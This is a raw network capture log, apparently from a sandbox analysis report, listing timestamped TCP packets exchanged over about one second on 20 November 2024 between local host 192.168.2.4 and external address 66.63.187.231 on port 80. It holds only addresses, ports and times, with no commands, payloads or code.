                                                                                                                              Nov 20, 2024 10:57:05.853940010 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.854870081 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.854935884 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.855051994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.855067968 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.855122089 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.855122089 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.856031895 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.856049061 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.856062889 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.856080055 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.856086016 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.856142044 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.856142044 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.857173920 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.857191086 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.857208014 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.857256889 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.857286930 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.868877888 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.870358944 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.968522072 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.968663931 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.968681097 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.968729019 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.968841076 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.968841076 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.969229937 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.969247103 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.969299078 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.969299078 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.969901085 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.969917059 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.969949007 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.970014095 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.970662117 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.970679045 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.970715046 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.970729113 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.971225023 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.971240044 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.971350908 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.971812963 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.971831083 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.971847057 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.971890926 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.971890926 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.971908092 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.972661018 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.972678900 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.972728968 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.972729921 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.973326921 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.973342896 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.973356962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.973397970 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.973397970 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.974020958 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.974039078 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.974071980 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.974134922 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.974775076 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.974791050 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.974843025 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.974843025 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.975522995 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.975539923 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.975591898 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.975591898 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.976524115 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.976541996 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.976557016 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.976583004 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.976613045 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.977169037 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.977185965 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.977241993 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.977241993 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.977814913 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.977834940 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.977885008 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.977885008 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.978640079 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.978657007 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.978696108 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.978709936 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.979404926 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.979422092 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.979435921 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.979464054 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.979482889 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.980164051 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.980181932 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.980216980 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.980290890 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.980974913 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.980992079 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.981046915 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.981046915 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.981553078 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.981570005 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.981618881 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.981618881 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.982371092 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.982389927 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.982426882 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.982441902 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.983076096 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.983093977 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.983108997 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.983127117 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.983158112 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.983195066 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.983792067 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.983808994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.983824015 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.983866930 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.983866930 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.984878063 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.984895945 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.984910965 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.984962940 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.984962940 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.985882998 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.985901117 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.985915899 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.985930920 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.985955954 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.985991001 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.985991001 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.986975908 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.986991882 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.987008095 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.987050056 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.987050056 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.987068892 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.988133907 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.988149881 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.988166094 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.988189936 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.988198996 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.989027023 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.989046097 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.989059925 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.989077091 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.989114046 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.989114046 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.989218950 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.990145922 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.990161896 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.990178108 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.990216970 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.990216970 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.991158962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.991177082 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:05.991205931 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:05.991332054 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.058917999 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.059029102 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.059045076 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.059192896 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.059192896 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.059192896 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.059506893 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.059524059 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.059578896 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.059578896 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.060225964 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.060240984 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.060256958 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.060300112 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.060327053 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.103049994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.103173018 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.103189945 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.103218079 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.103243113 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.103332043 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.103791952 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.103809118 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.103847980 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.103859901 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.104383945 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.104399920 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.104449034 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.104449034 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.104859114 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.104873896 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.104887962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.104914904 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.104926109 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.105916023 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.106018066 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.106076956 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.106092930 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.106108904 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.106142044 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.106142044 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.106169939 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.107022047 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.107094049 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.107181072 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.107197046 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.107233047 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.107247114 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.108452082 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.108505964 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.108592033 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.108608961 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.108649015 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.108696938 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.109580994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.109596968 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.109611988 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.109627962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.109637976 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.109678984 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.109678984 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.110301971 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.110318899 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.110333920 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.110374928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.110374928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.111339092 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.111355066 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.111368895 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.111386061 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.111392021 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.111495972 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.112157106 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.112174034 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.112288952 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.112293959 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.112349987 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.113274097 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.113291025 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.113306046 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.113343000 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.113390923 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.114356041 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.114372969 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.114388943 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.114404917 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.114423990 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.114439011 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.114463091 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.115302086 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.115365028 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.115462065 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.115613937 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.116324902 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.116383076 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.116782904 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.116800070 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.116837025 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.116853952 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.117695093 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.117712021 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.117727041 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.117738008 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.117763042 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.117783070 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.118632078 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.118649006 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.118688107 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.118700981 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.119410038 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.119426012 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.119472027 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.119530916 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.120409966 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.120426893 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.120482922 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.120482922 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.121062040 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.121078968 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.121134043 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.121143103 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.121205091 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.121222019 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.121263981 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.121263981 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.122179031 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.122195959 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.122212887 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.122250080 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.122250080 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.122318983 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.123116970 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.123133898 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.123150110 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.123208046 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.123208046 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.124305010 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.124404907 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.124449968 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.124468088 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.124483109 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.124520063 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.124520063 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.124543905 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.133893013 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.133913994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.133929968 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.133948088 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.133963108 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.133977890 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.133994102 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134007931 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134023905 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134038925 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134047985 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134047985 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134053946 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134068966 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134083986 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134090900 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134090900 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134100914 CET804973066.63.187.231192.168.2.4
